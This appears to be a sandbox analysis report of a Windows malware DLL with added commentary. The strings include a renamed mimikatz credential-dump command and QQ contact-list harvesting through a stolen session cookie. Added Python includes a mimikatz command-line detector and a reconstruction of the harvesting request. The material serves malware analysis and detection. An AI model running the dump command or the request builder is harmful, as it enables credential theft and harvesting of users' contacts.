                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoadProcess$Console$FreeHandleListSleep$#823#825CloseCurrentModuleOpenTerminate
                                                          • String ID: AttachConsole$C$DisconnectNamedPipe$F$KERNEL32.dll$S$TerminateProcess$TerminateThread$W$a$c$e$e$elgn$esolC$g$l$l$l$n$o$o$r$s
                                                          • API String ID: 708691324-3966567685
                                                          • Opcode ID: 22dcc9dcdef9eb33aac94f5418d72076aa39dac69a447e46f29e8e9069031d2e
                                                          • Instruction ID: 22ecc8b84f5612ae9a4b25da8054c7e915ffc6ebd0d1b6b9dc2bd0e2f752a24a
                                                          • Opcode Fuzzy Hash: 22dcc9dcdef9eb33aac94f5418d72076aa39dac69a447e46f29e8e9069031d2e
                                                          • Instruction Fuzzy Hash: 90B1B1746083949BDB20DF68CC84BDFBBE9AF95740F45481DF9889B241C7B5E904CBA2
                                                          APIs
                                                          • strstr.MSVCRT ref: 10013514
                                                          • strstr.MSVCRT ref: 10013527
                                                          • strstr.MSVCRT ref: 1001353C
                                                          • strncpy.MSVCRT ref: 10013588
                                                          • _itoa.MSVCRT ref: 100135CE
                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 100135E7
                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1001360D
                                                          • InternetCloseHandle.WININET(00000000), ref: 1001361A
                                                          • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 1001364A
                                                          • InternetCloseHandle.WININET(00000000), ref: 1001365D
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013660
                                                          • sprintf.MSVCRT ref: 1001368B
                                                          • HttpSendRequestA.WININET(00000000,?,?,?), ref: 100136C3
                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 100136DF
                                                          • InternetCloseHandle.WININET(00000000), ref: 100136F0
                                                          • InternetCloseHandle.WININET(00000000), ref: 100136F3
                                                          • InternetCloseHandle.WININET(00000000), ref: 100136F6
                                                          • atol.MSVCRT ref: 1001370F
                                                          • #823.MFC42(00000001,?,?), ref: 1001371D
                                                          • InternetReadFile.WININET(00000000,00000000,00000001,?), ref: 10013745
                                                          • #825.MFC42(00000000), ref: 10013750
                                                          • InternetCloseHandle.WININET(00000000), ref: 1001375F
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013762
                                                          • InternetCloseHandle.WININET(?), ref: 10013769
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013781
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013784
                                                          • InternetCloseHandle.WININET(?), ref: 1001378B
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 1001379B
                                                          • #823.MFC42(00000002), ref: 100137A8
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 100137D2
                                                          • #825.MFC42(00000000), ref: 100137D9
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 100137F0
                                                          • #823.MFC42(00000001), ref: 100137FC
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013827
                                                          • #825.MFC42(00000000), ref: 1001382E
                                                          • #825.MFC42(00000000,00000000,00000000), ref: 1001383C
                                                          Strings
                                                          • /cgi-bin/qun_mgr/get_friend_list, xrefs: 100134DB
                                                          • qun.qq.com, xrefs: 100134BB
                                                          • Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 10013685
                                                          • bkn=, xrefs: 1001354D
                                                          • HTTP/1.1, xrefs: 1001363E
                                                          • , xrefs: 10013503
                                                          • skey=, xrefs: 10013521
                                                          • POST, xrefs: 10013644
                                                          • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 100134AF
                                                          • p_skey, xrefs: 100134FD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandle$#825ByteCharMultiWide$#823Httpstrstr$OpenRequest$ConnectFileInfoQueryReadSend_itoaatolsprintfstrncpy
                                                          • String ID: $/cgi-bin/qun_mgr/get_friend_list$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$bkn=$p_skey$qun.qq.com$skey=
                                                          • API String ID: 3684279964-1003693118
                                                          • Opcode ID: 83a2f2817c2aedd7fbe9857ede55100449b32c6472bc6b786a787f71fcc3d649
                                                          • Instruction ID: a6aeb5833008578cdead13e838f5760d2c554c937ea3091131f56ecc18512e5b
                                                          • Opcode Fuzzy Hash: 83a2f2817c2aedd7fbe9857ede55100449b32c6472bc6b786a787f71fcc3d649
                                                          • Instruction Fuzzy Hash: 4FA137726003146BE314DA788C41FAB7BDDFBC4320F044629FA59E72C0DEB4A9058B95
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • DeleteFileA.KERNEL32(00000001,?,00000001,00000001,?,00000001,00000001,00000001), ref: 1000874C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressDeleteFileHandleLibraryLoadModuleProc
                                                          • String ID: .$2$3$4$4$6$6$E$E$F$K$L$N$R$R$R$R$W$W$a$c$d$d$i$i$i$l$l$n$n$o$o$o$open$r$r$r$s$t$t$v$w$w
                                                          • API String ID: 357481036-173339048
                                                          • Opcode ID: b35eb0abf191cff89a94c78c48ed883a63f7157c3257380d681e420933c49f90
                                                          • Instruction ID: b2534d6be5788ef259c749724872d3f87395c9b78c17d96c33da540c7ee2e7e0
                                                          • Opcode Fuzzy Hash: b35eb0abf191cff89a94c78c48ed883a63f7157c3257380d681e420933c49f90
                                                          • Instruction Fuzzy Hash: 5B91291010C3C0D9E356C668848871FBED6ABA668CF48598DB1C95B287C6BF961CC77B
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(KERNEL32.dll,AttachConsole), ref: 10022086
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10022093
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,WriteFile), ref: 100220A1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100220A8
                                                          • Sleep.KERNEL32(0000000A), ref: 100220F7
                                                          • GetConsoleProcessList.KERNEL32(?,00000001), ref: 10022117
                                                          • #823.MFC42 ref: 1002212C
                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 1002213C
                                                          • GetCurrentProcessId.KERNEL32 ref: 1002215C
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10022173
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 10022182
                                                          • CloseHandle.KERNEL32(00000000), ref: 10022185
                                                          • #825.MFC42(00000000), ref: 100221B0
                                                          • FreeConsole.KERNEL32 ref: 100221BE
                                                          • Sleep.KERNEL32(0000000A), ref: 100221C6
                                                          • FreeConsole.KERNEL32 ref: 100221CC
                                                            • Part of subcall function 10010BA0: SetEvent.KERNEL32(?,10017547), ref: 10010BA4
                                                          • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1002233F
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 10022383
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 100223A7
                                                          • CloseHandle.KERNEL32(00000000), ref: 100223B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$Console$Handle$AddressCloseFileFreeListProcSleep$#823#825CreateCurrentDirectoryEventLibraryLoadModuleOpenSystemTerminateWrite
                                                          • String ID: AttachConsole$Control-C^C$GetMP privilege::debug sekurlsa::logonpasswords exit$KERNEL32.dll$WriteFile$\GetMP.exe
                                                          • API String ID: 1461520672-3309419308
                                                          • Opcode ID: cac31e0da7138558aa65d5e754d5fbe1c86959fccf694da2ade540117515b44f
                                                          • Instruction ID: f641c1ed515820e953bbe51d1dd59cc8d6dc84500f78be80370a3875dfa9a0c7
                                                          • Opcode Fuzzy Hash: cac31e0da7138558aa65d5e754d5fbe1c86959fccf694da2ade540117515b44f
                                                          • Instruction Fuzzy Hash: B9A12875600315ABD710EB64DC81FDB77D4FB84390F450629FE49AB280DA35EC49CBA2
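The function above drops a file named \GetMP.exe under the directory returned by GetSystemDirectoryA (CreateFileA with 0x40000000 = GENERIC_WRITE and 2 = CREATE_ALWAYS, then WriteFile) and carries the command line "GetMP privilege::debug sekurlsa::logonpasswords exit", which is mimikatz command syntax under a renamed binary; the GetConsoleProcessList / OpenProcess(0x1 = PROCESS_TERMINATE) / TerminateProcess loop before it kills the other processes attached to the console. Because the binary name is arbitrary, a detection keyed on the image name misses it. The following is an added example, not part of the sandbox report or the sample, that matches the module::command syntax in process-creation command lines instead; the log format (pid|image|cmdline) and the events are constructed for the example, and the module list is the set of mimikatz module names, which keeps C++ scope operators such as std::string in compiler command lines from firing.

```python
import ntpath
import re

# Mimikatz module names (the part before "::"). The sample's embedded command line,
# "GetMP privilege::debug sekurlsa::logonpasswords exit", uses two of them.
MIMIKATZ_MODULES = {
    "privilege", "sekurlsa", "lsadump", "kerberos", "token", "crypto",
    "vault", "dpapi", "misc", "standard", "event", "ts", "process",
}

# module::command tokens; only tokens whose module is in the set above count,
# so "std::string" in a compiler command line is not a hit.
_TOKEN = re.compile(r"\b([A-Za-z]+)::([A-Za-z]+)\b")


def mimikatz_tokens(cmdline):
    """Return the lower-cased mimikatz module::command tokens found in one command line."""
    hits = []
    for module, command in _TOKEN.findall(cmdline):
        if module.lower() in MIMIKATZ_MODULES:
            hits.append("%s::%s" % (module.lower(), command.lower()))
    return hits


def scan(records):
    """Scan process-creation records in the constructed 'pid|image|cmdline' format.

    Matching is on the command line only, so a renamed binary (GetMP.exe in this
    sample) does not evade it; 'renamed' additionally flags that the image name is
    not the stock mimikatz.exe, which is itself worth noting in the finding.
    """
    findings = []
    for record in records:
        pid, image, cmdline = record.split("|", 2)
        tokens = mimikatz_tokens(cmdline)
        if tokens:
            findings.append({
                "pid": int(pid),
                "image": image,
                "tokens": tokens,
                "renamed": ntpath.basename(image).lower() != "mimikatz.exe",
            })
    return findings


# Constructed sample events; these are not taken from the sandbox run's event log.
SAMPLE_EVENTS = [
    r"4412|C:\Windows\System32\GetMP.exe|GetMP privilege::debug sekurlsa::logonpasswords exit",
    r"2208|C:\Tools\cl.exe|cl.exe /D NAME=std::string main.cpp",
    r"5120|C:\Users\user\Downloads\mimikatz.exe|mimikatz.exe 'lsadump::sam' exit",
    r"1984|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\user\notes.txt",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Pair this with a file-creation rule for executables written directly under the system directory by a non-installer process; the command-line match covers the credential dump itself, the file rule covers the drop that precedes it.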
                                                          APIs
                                                          • InternetOpenA.WININET ref: 100138CF
                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 100138F5
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013902
                                                          • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 10013932
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013945
                                                          • InternetCloseHandle.WININET(00000000), ref: 10013948
                                                          Strings
                                                          • qun.qq.com, xrefs: 10013878
                                                          • Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 1001396D
                                                          • , xrefs: 100138BC
                                                          • HTTP/1.1, xrefs: 10013926
                                                          • POST, xrefs: 1001392C
                                                          • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 1001386F
                                                          • /cgi-bin/qun_mgr/search_group_members, xrefs: 10013898
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandle$Open$ConnectHttpRequest
                                                          • String ID: $/cgi-bin/qun_mgr/search_group_members$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$qun.qq.com
                                                          • API String ID: 3078302290-2376693140
                                                          • Opcode ID: 492e52c6053871d090237183561d3215cecf92edc6964bc9b14581eaf8abf60b
                                                          • Instruction ID: ea8ef1183b0b68027489ada680c689866708b7ee025198ed557c1e0327d219cf
                                                          • Opcode Fuzzy Hash: 492e52c6053871d090237183561d3215cecf92edc6964bc9b14581eaf8abf60b
                                                          • Instruction Fuzzy Hash: 197119366447147BF310EB689C45FAB77DDFB84720F184629F749A72C0DAB4A9048BA2
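The two WinINet functions above (get_friend_list, and search_group_members directly above) both open an HTTP connection to qun.qq.com on port 0x50 = 80 (service type 3 = INTERNET_SERVICE_HTTP), build a POST with the header template "Accept: */*, Referer: http://qun.qq.com%s, Accept-Language: zh-cn, Content-Type: application/x-www-form-urlencoded, Cookie: %s" (line breaks lost in extraction), and send it with a stolen QQ web session cookie. The first one also pulls skey / p_skey out of the cookie, converts a number with _itoa and places it after "bkn=", reads the body sized by HttpQueryInfoA(5 = HTTP_QUERY_CONTENT_LENGTH) and atol, and converts it from UTF-8 (MultiByteToWideChar with code page 0xFDE9 = 65001). The code below is an added example, not the sample's code or anything from the report, that reconstructs the request the trace describes: the bkn value is computed with the publicly documented qun.qq.com CSRF-token hash of skey, which is an assumption about what the sample's strstr/_itoa path does; the two %s are assumed to be the request path and the raw cookie; the cookie value and any extra form fields are constructed for the example.

```python
from urllib.parse import urlencode

# Literal values recovered from the report's string references.
USER_AGENT = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"   # InternetOpenA agent
HOST = "qun.qq.com"
PORT = 80                                                            # InternetConnectA(..., 0x50, ...)
ENDPOINTS = {
    "friends": "/cgi-bin/qun_mgr/get_friend_list",
    "members": "/cgi-bin/qun_mgr/search_group_members",
}


def cookie_value(cookie, name):
    """Exact-key lookup in a Cookie header value.

    A plain substring search for 'skey=' (what strstr does) also matches inside
    'p_skey=', so keys are compared whole here.
    """
    for part in cookie.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None


def bkn_from_skey(skey):
    """qun.qq.com 'bkn' CSRF token derived from skey (publicly documented hash).

    Assumption: this is what the sample computes between strstr('skey=') and
    _itoa; the report shows the inputs and the 'bkn=' output, not the arithmetic.
    """
    h = 5381
    for byte in skey.encode("ascii"):
        h = (h + (h << 5) + byte) & 0xFFFFFFFF   # 32-bit wraparound as in native code
    return h & 0x7FFFFFFF


def build_request(cookie, endpoint, extra_fields=None):
    """Assemble the POST the sample sends (headers from the report's template)."""
    path = ENDPOINTS[endpoint]
    skey = cookie_value(cookie, "skey")
    if skey is None:
        raise ValueError("cookie carries no skey")
    fields = [("bkn", bkn_from_skey(skey))]
    # Further form fields (for example a group id for search_group_members) are
    # not visible in the report; the caller supplies them, they are not assumed here.
    fields += list((extra_fields or {}).items())
    headers = {
        "Accept": "*/*",
        "Referer": "http://%s%s" % (HOST, path),   # first %s assumed to be the path
        "Accept-Language": "zh-cn",
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": cookie,                           # second %s assumed to be the raw cookie
        "User-Agent": USER_AGENT,
    }
    return {"method": "POST", "host": HOST, "port": PORT, "path": path,
            "headers": headers, "body": urlencode(fields)}


if __name__ == "__main__":
    # Constructed cookie; the values are placeholders, not captured data.
    demo_cookie = "uin=o0123456789; p_skey=PSKEYVALUE; skey=@a"
    print(build_request(demo_cookie, "friends"))
```

For detection the useful part is the client side, not the token arithmetic: a POST to qun.qq.com/cgi-bin/qun_mgr/ from a process that is not a browser, carrying the MSIE 9.0 agent string above, is the sample harvesting the victim's QQ contact and group member lists with a session cookie it has already read from the browser.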
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1002C1EF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002C1F8
                                                          • LoadLibraryA.KERNEL32(wininet.dll,InternetCloseHandle), ref: 1002C226
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002C229
                                                          • LoadLibraryA.KERNEL32(wininet.dll,InternetOpenUrlA), ref: 1002C239
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002C23C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: $($)$.$/$0$4$CreateFileA$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$KERNEL32.dll$M$WININET.dll$b$c$e$m$o$o$p$t$wininet.dll$z
                                                          • API String ID: 2574300362-3884860928
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • GetVersionExA.KERNEL32(?), ref: 1001DF7B
                                                            • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                            • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                            • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                          • ExitProcess.KERNEL32 ref: 1001E015
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressLoadProc$ExitFreeHandleModuleProcessVersion
                                                          • String ID: .$.$2$2$3$3$D$I$L$P$S$S$S$S$V$a$c$d$d$e$e$e$e$e$i$l$l$l$l$n$r$s$u$v$v
                                                          • API String ID: 1234256494-3470857448
                                                          APIs
                                                          • AttachConsole.KERNEL32(?), ref: 1000FEF3
                                                          • Sleep.KERNEL32(0000000A), ref: 1000FEFB
                                                          • AttachConsole.KERNEL32(?), ref: 1000FF05
                                                          • GetConsoleProcessList.KERNEL32(?,00000001), ref: 1000FF18
                                                          • #823.MFC42(00000000), ref: 1000FF29
                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 1000FF39
                                                          • GetCurrentProcessId.KERNEL32 ref: 1000FF43
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 1000FF57
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000FF66
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000FF6D
                                                          • #825.MFC42(00000000), ref: 1000FF7E
                                                          • FreeConsole.KERNEL32 ref: 1000FF8C
                                                          • Sleep.KERNEL32(0000000A), ref: 1000FF94
                                                          • FreeConsole.KERNEL32 ref: 1000FF9A
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 1000FFA6
                                                          • CloseHandle.KERNEL32(?), ref: 10010006
                                                          • CloseHandle.KERNEL32(?), ref: 1001000E
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001002F
                                                          • OpenServiceA.ADVAPI32(00000000,1011EC82,00000010), ref: 10010043
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10010050
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010066
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10010077
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001007A
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10010087
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001008A
                                                          • GetCommandLineA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 100100C8
                                                          • CreateProcessA.KERNEL32(00000000,00000000), ref: 100100D1
                                                          • CloseHandle.KERNEL32(?), ref: 100100E4
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 100100FB
                                                          • CreateProcessA.KERNEL32 ref: 1001016C
                                                          • CloseHandle.KERNEL32(?), ref: 1001017F
                                                          • CloseHandle.KERNEL32(?), ref: 10010186
                                                          • ExitProcess.KERNEL32 ref: 1001018A
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$Process$Service$Console$Open$AttachCreateFreeListSleepTerminate$#823#825CommandCurrentExitFileLineManagerModuleNameStart
                                                          • String ID: -inst$D$D
                                                          • API String ID: 2444995177-2453324352
                                                          APIs
                                                          • #535.MFC42(00000030,00000002,00000000,?,00000000), ref: 10011B2F
                                                          • #540.MFC42 ref: 10011B40
                                                          • #540.MFC42 ref: 10011B4E
                                                          • #6282.MFC42 ref: 10011B69
                                                          • #6283.MFC42 ref: 10011B72
                                                          • #941.MFC42(100FA644), ref: 10011B80
                                                          • #2784.MFC42(100FB4F0,100FA644), ref: 10011B8E
                                                          • #6662.MFC42(00000022,00000001,100FB4F0,100FA644), ref: 10011BB7
                                                          • #4278.MFC42(00000030,00000001,00000000,00000022,00000001,100FB4F0,100FA644), ref: 10011BD6
                                                          • #858.MFC42(00000000,00000030,00000001,00000000,00000022,00000001,100FB4F0,100FA644), ref: 10011BE5
                                                          • #4129.MFC42(?,00000000,100FB4F0,100FA644), ref: 10011C8B
                                                          • #858.MFC42(00000000,?,00000000,100FB4F0,100FA644), ref: 10011C98
                                                          • #800.MFC42(00000000,?,00000000,100FB4F0,100FA644), ref: 10011CA6
                                                          • #535.MFC42(?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011CC2
                                                          • #858.MFC42(00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011CFA
                                                          • #858.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D07
                                                          • #2614.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D10
                                                          • #2614.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D19
                                                          • #5710.MFC42(?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D32
                                                          • #858.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D41
